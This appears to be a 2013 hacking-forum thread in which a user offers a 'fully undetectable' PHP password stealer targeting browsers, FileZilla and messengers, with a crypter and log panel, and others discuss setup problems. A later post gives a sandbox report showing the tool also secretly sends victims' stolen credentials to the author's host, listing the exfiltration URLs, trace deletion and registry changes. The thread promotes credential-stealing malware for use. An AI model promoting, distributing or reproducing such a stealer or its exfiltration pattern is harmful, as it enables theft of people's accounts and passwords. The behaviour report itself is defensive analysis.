Anti-Av PHP Stealer [2013 FUD] Stabil!

Slwestr · Jul 16, 2013

hey guys, its our 1st php stealer..we r happy to share.

-Internet Explorer 6-7-8-9-10 !

-Internet Download Manager

-Filezilla Client / Server

-Google Chrome all

-Opera all

-Safari all

-Mozilla Firefox all

-Messenger Live

-Yahoo Messenger

-JDownloader

Which stealer can get ie10 pw's from win8 x64?

Tested;

WinXP, vista x32-x64,win7 x86-x64,win8 x86-x64!

PHP Logs panel;

we r share stealer with fud crypter;

Stealer exe crypted results; but increase exe size..cuz used protector..

install tut, used free host website: 000webhost,

This link is hidden for visitors. Please Log in or register now.

Download;

This link is hidden for visitors. Please Log in or register now.

Alternative;

This link is hidden for visitors. Please Log in or register now.

rar pass: slwestr

notes: autoglut.servegame.com is update check page..

This link is hidden for visitors. Please Log in or register now.

sQuo · Jul 17, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

password dont work

mega-scorpion · Jul 17, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

Tested, but doesn't work. no logs come to the page.

I've done everything fine, installing page making the trojan.

what's the problem?

Slwestr · Jul 17, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

i think its website mysql problem, or ur pc not have any saved pw?

goldregister · Jul 17, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

The stealer work fine i test it ,nice share

mega-scorpion · Jul 18, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

I'm using paid host to do that on hostgator, I worked on other stealers and work fine, but this one not

mega-scorpion · Jul 18, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

I get this error message when I click test log

---------------------------

Anti-av

---------------------------

hata var bilader, tekrar bak

---------------------------

OK

---------------------------

My OS win8 enterpise.

What is the solution?

&#1069;&#1076;&#1041;&#109 · Jul 18, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

This link is hidden for visitors. Please Log in or register now.

lipsrsealed:

TIFONS · Jul 18, 2013

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

Como bien dice ЭдБытсс esta backdorizada.

reporte BSA:

[ Changes to filesystem ]

* Modifies file C:\Users\XXXX\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

* Deletes file C:\Users\XXXX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp

[ Changes to registry ]

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{0358B920-0AC7-461F-98F4-58E32CD89148}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{057EEE47-2572-4AA1-88D7-60CE2149E33C}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledProcesses

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledSessions

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\PeerDist\Service

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea5f7-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea634-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45cc1d6c-eca1-11e1-9547-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7c627537-5fd7-11e1-9cc6-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b0b98a20-5f41-11e1-b30b-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b124dd89-6004-11e1-aaa9-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b3a9e94c-a932-11e2-b7b2-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ed3bffff-790f-11e1-a31b-000c292fcffb}

old value empty

* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content

old value "CachePrefix=0000"

* Modifies value "SavedLegacySettings=4600000069070000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100005EF579FD3C6828963F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "SavedLegacySettings=4600000068070000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100009D38953C3018161B3F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

* Modifies value "DefaultConnectionSettings=4600000035600000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100009D386AB8289D35BA3F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

old value "DefaultConnectionSettings=4600000034600000090000000000000000000000000000000400000000000000C39A58245EDBCD010000000000000000000000000200000002000000C0A801910000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001700000000000000200100005EF579FD3C6828963F57FE6E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

* Creates value "TEST.exe=Slwestr" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer

binary data=53006C00770065007300740072000000

[ Network services ]

* Looks for an Internet connection.

* Queries DNS "autoglut.servegame.com".

* G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer\TEST.exe Connects to "50.28.8.18" on port 80 (TCP - HTTP).

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=Password&password=Password%20Strength&app=User%20Name&pcname=EDITADO-POR-MI&sitename=eb%20Browser".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20hackear%20a%20tu%20puta%20madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20pelarla%20lammersillo%20jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=u947071809&password=3nGZRuaEqL&app=Filezilla&pcname=XXXX&sitename=31.170.166.199".

* Opens next URLs:

This link is hidden for visitors. Please Log in or register now.

Strength&app=User Name&pcname=XXXX&sitename=eb Browser--->> backdoor

This link is hidden for visitors. Please Log in or register now.

hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->correcto lo que yo recibiria

This link is hidden for visitors. Please Log in or register now.

hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

This link is hidden for visitors. Please Log in or register now.

pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->correcto lo que yo recibiria

This link is hidden for visitors. Please Log in or register now.

pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

This link is hidden for visitors. Please Log in or register now.

--->correcto lo que yo recibiria

This link is hidden for visitors. Please Log in or register now.

--->> backdoor

[ Process/window/string information ]

* Deletes activity traces.

* Sleeps 960 seconds.

pd , uso dos cuentas con pass falsa para testar , y una de filezila que era verdadera,aunque ya no la uso , es lo unico que edite aparte del nombre de mi pc del reporte.

como se ve conecta aparte de localhost al autor .

pd2: el foro me va muyyyyyyyyyy lento , postear esto me costo horrores,

Un saludo

IP Tools

Basic Encoders/Decoders

Hash Generators

Classical Ciphers

Modern Cryptography

Other Tools

Anti-Av PHP Stealer [2013 FUD] Stabil!

Slwestr

Banned

sQuo

~ KillmeMories ~

mega-scorpion

Leech

Slwestr

Banned

goldregister

LvL-23

mega-scorpion

Leech

mega-scorpion

Leech

ЭдБ&#109

Leech

TIFONS

\\|// 0_0\\|//